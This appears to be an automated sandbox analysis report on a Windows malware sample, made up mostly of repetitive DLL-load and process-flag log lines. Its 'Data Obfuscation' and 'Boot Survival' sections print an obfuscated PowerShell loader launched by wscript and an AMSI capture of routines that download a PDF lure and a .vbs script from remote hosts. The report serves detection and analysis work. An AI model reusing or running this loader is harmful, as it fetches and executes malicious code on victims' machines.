          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1543104740.000002CD47A21000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1543104740.000002CD47990000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: n.pdb source: powershell.exe, 00000005.00000002.1432126948.000001B65C8BD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1432612236.000001B65C95A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2658934966.0000022F3971F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdbpdbtem.pdb source: powershell.exe, 00000009.00000002.2658538272.0000022F395CF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.2658934966.0000022F39763000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *.pdb source: powershell.exe, 00000002.00000002.1606506810.000002CD5FD1C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdbE source: powershell.exe, 00000005.00000002.1434410083.000001B65CC9A000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF7C0F07613 push edi; ret 2_2_00007FF7C0F07616
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FF7C0F00D6C push eax; ret 5_2_00007FF7C0F00D6D

          Boot Survival

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htb2hwww.fornid.com/wh/List%20of%20rualquiruald%20itualms%20and%20sualrvicuals.pdf';getit -fz $flol -oulv 'htb2hwww.pinualapplualtualch.aual/na/mg.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this mod

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
